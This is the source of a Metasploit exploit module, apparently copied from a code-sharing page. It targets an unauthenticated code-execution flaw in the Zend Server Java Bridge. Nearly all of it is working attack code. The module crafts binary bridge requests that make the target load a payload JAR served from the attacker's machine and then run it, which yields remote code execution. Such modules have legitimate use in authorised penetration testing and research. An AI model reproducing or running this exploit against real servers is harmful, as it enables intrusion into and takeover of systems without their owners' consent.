Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::HttpServer
10
  include Msf::Exploit::Remote::Tcp
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Zend Server Java Bridge Arbitrary Java Code Execution',
15
      'Description'    => %q{
16
          This module takes advantage of a trust relationship issue within the
17
        Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
18
        between PHP and Java code within Zend Server.
19

20
          When Java code is encountered Zend Server communicates with the Java Bridge. The
21
        Java Bridge then handles the java code and creates the objects within the Java Virtual
22
        Machine. This interaction however, does not require any sort of authentication. This
23
        leaves the JVM wide open to remote attackers. Sending specially crafted data to the
24
        Java Bridge results in the execution of arbitrary java code.
25
      },
26
      'Author'         => [ 'bannedit' ],
27
      'License'        => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          [ 'OSVDB', '71420'],
31
          [ 'ZDI', '11-113'],
32
          [ 'EDB', '17078' ],
33
        ],
34
      'Platform'       => ['java'], # win
35
      'Arch'           => ARCH_JAVA,
36
      'Privileged'     => true,
37
      'Targets'        =>
38
        [
39
          [ 'Linux', {}],
40
          [ 'Windows', {}],
41
        ],
42
      'DisclosureDate' => '2011-03-28',
43
      'DefaultTarget' => 0))
44
      register_options( [ Opt::RPORT(10001) ])
45
  end
46

47
  def exploit
48
    start_service()
49
    send_java_require
50
  end
51

52
  def send_java_require()
53
    connect
54

55
    jar = rand_text_alpha(rand(8)+1) + '.jar'
56
    path = get_uri + '/' + jar
57
    uri_len = path.length
58
    java_require = [0xffffffff, 0x16000000].pack('V*') +
59
    "setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
60
    [uri_len].pack('C') + path
61

62
    java_require = [java_require.length].pack('N') + java_require
63

64
    print_status("Sending java_require() request... #{path}")
65
    sock.put(java_require)
66
    res = sock.get_once
67

68
    select(nil, nil, nil, 5) # wait for the request to be handled
69
    create_and_exec
70
  end
71

72
  def create_and_exec
73
    print_status("Sending Final Java Bridge Requests")
74

75
    create_obj =
76
      [0x34000000, 0x00000000, 0x0c000000].pack('V*') +
77
      "CreateObject" +
78
      [0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
79
      "metasploit.Payload" +
80
      [0x07000000].pack('N') + [0x00].pack('C')
81

82
    sock.put(create_obj)
83
    res = sock.get_once
84
    obj_id = res[5,4]
85

86
    callmain =
87
    [0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
88
    [0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +
89
    [0x00].pack('C') + [0x00].pack('C')
90

91
    sock.put(callmain)
92
    sock.get_once
93
    handler()
94
  end
95

96
  def on_request_uri(cli, request)
97
    if request.uri =~ /\.jar$/i
98
      send_response(cli, payload.encoded,
99
      {
100
        'Content-Type' => 'application/java-archive',
101
        'Connection'   => 'close',
102
        'Pragma'       => 'no-cache'
103
      })
104

105
      print_status("Replied to Request for Payload JAR")
106
    end
107
  end
108
end
109

110